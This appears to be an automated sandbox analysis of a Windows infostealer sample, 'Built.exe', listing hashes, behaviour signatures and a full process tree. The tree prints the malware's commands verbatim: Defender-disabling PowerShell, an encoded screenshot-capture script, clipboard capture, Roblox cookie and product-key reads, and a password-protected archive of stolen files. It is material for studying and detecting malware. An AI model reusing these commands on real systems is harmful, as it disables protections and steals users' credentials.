Resubmissions

13-10-2024 12:27

241013-pmy7haweqc 10

13-10-2024 12:23

241013-pkn9hswdrg 10

Analysis

  • max time kernel
    1523s
  • max time network
    1502s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    13-10-2024 12:23

General

  • Target

    Built.exe

  • Size

    7.5MB

  • MD5

    77ce148ebc6b40ab91443366a25e1701

  • SHA1

    2e7cc8aad370ffb8b3943ecab6a16cdb0b7deac3

  • SHA256

    710acafa5ccbe58fb2000bd23161ca1fa70e1080bbe244bfa794a733d1f931c5

  • SHA512

    fc46de3075c7a6c28c9f3aeb21e5b9f5e2122484388fb183da8f799bb3b26840746102cd15a2d523d6c71573c74b44f8410debf29d7aae43901d63171ff2d18a

  • SSDEEP

    196608:OXQCwuLTurErvI9pWjgN3ZdahF0pbH1AY7CtQsNI/Sx3C1b:T4urEUWjqeWxA6nAYb

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 54 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4016
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2064
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5040
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3024
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3288
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('BRWEE GANDUU', 0, 'MAA CHUDAOO ', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3040
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('BRWEE GANDUU', 0, 'MAA CHUDAOO ', 0+16);close()"
          4⤵
            PID:2636
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4536
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1724
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5044
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4104
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3820
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1480
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:3492
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4156
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1600
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4992
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2444
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:3860
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1916
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:1860
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4980
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4428
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\11bfdv23\11bfdv23.cmdline"
                5⤵
                  PID:4792
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8712.tmp" "c:\Users\Admin\AppData\Local\Temp\11bfdv23\CSCFED4C2FFCB244C8B5D7835EC17C18F.TMP"
                    6⤵
                      PID:3124
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1816
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:4684
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2024
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:1716
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2700
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:2980
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2076
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:4504
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:1884
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:2924
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                            3⤵
                              PID:1832
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3860
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:4828
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:560
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "getmac"
                                3⤵
                                  PID:4624
                                  • C:\Windows\system32\getmac.exe
                                    getmac
                                    4⤵
                                      PID:3900
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40162\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\Zv1WN.zip" *"
                                    3⤵
                                      PID:2300
                                      • C:\Users\Admin\AppData\Local\Temp\_MEI40162\rar.exe
                                        C:\Users\Admin\AppData\Local\Temp\_MEI40162\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\Zv1WN.zip" *
                                        4⤵
                                        • Executes dropped EXE
                                        PID:4776
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                      3⤵
                                        PID:244
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic os get Caption
                                          4⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2584
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                        3⤵
                                          PID:4944
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic computersystem get totalphysicalmemory
                                            4⤵
                                              PID:4372
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                            3⤵
                                              PID:772
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic csproduct get uuid
                                                4⤵
                                                  PID:2704
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                3⤵
                                                  PID:3000
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3960
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                  3⤵
                                                    PID:4720
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic path win32_VideoController get name
                                                      4⤵
                                                      • Detects videocard installed
                                                      PID:1100
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                    3⤵
                                                      PID:2680
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4848

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  627073ee3ca9676911bee35548eff2b8

                                                  SHA1

                                                  4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                  SHA256

                                                  85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                  SHA512

                                                  3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  2e8eb51096d6f6781456fef7df731d97

                                                  SHA1

                                                  ec2aaf851a618fb43c3d040a13a71997c25bda43

                                                  SHA256

                                                  96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

                                                  SHA512

                                                  0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  aa4f31835d07347297d35862c9045f4a

                                                  SHA1

                                                  83e728008935d30f98e5480fba4fbccf10cefb05

                                                  SHA256

                                                  99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0

                                                  SHA512

                                                  ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  16a570a930fb6e5d90f1cc29245c77da

                                                  SHA1

                                                  d5b744583424ece6b082faa06029c962708b8246

                                                  SHA256

                                                  fc4a86ae0903da4b1dc336cfc20c858ba24e134de7e3497f64830a72da150bf2

                                                  SHA512

                                                  35e69459a64b8172005e09d48e4356837b636682b7a3aebec93f5c605b1616acff9374acff900f414eb8af332a8f7e958627a87108e4a9a65a3bbeb662f9deb3

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

                                                  MD5

